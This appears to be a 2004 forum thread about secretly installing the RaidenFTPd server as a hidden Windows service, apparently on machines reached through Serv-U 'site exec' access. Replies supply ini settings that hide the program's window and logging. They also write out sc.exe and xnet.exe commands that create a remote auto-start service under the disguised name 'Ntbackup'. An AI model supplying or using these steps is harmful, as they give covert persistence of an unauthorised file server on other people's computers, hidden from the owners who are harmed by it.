Starlight
May 3 2004, 09:49 PM
i have configure all my files for raidenftpd, but i don't know how to set raidenftpd on service whive an orther way that the program of raidenftpdservice.exe
i would know how can i put raidenftpd as service and how can i start it as hide mode...
i have access to a servu whive site exec for simplify the thing

can somebody help me please ?
thx
EXPLOiTED
May 3 2004, 09:52 PM
Well setup a kit and test it all on your pc many times...
Loxy
May 3 2004, 11:06 PM
I use services.exe and srvany.exe to install raiden as a service, and of course set raiden to run hidden. I setup everything locally how I want it first, then upload the files and load them up. and Bam! ; )
Starlight
May 3 2004, 11:25 PM
but what is the line for start raiden as hide ?
B3T4
May 4 2004, 10:48 AM
/hide ? - dunno, just keep on testing, keep on testing
maybe its written in the registry, u could do a search there...
Loxy
May 4 2004, 06:02 PM
Default is "net start RaidenFTPd" : P
guufa
May 4 2004, 08:00 PM
First for Hiding yout raiden put this lines in your ini:
| CODE |
[SYSTEM] START_MINIMIZE=2 LOG_SCREEN=0 OPACITY=1 |
For installing it remotely you can use tools as sc.exe or xnet.exe
| CODE |
sc \\128.128.128.128 create Ntbackup binpath= C:\winnt\system32\Raiden.exe type= own start= auto error= normal tag= no displayname= "Raiden" sc \\128.128.128.128 start Raiden |
and with xnet.exe if you have a shell or site exec
| CODE |
XNET INSTALL Raiden /b:c:\WINNT\system32\raiden.exe /n:Raiden /s:auto XNET START Raiden
|
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.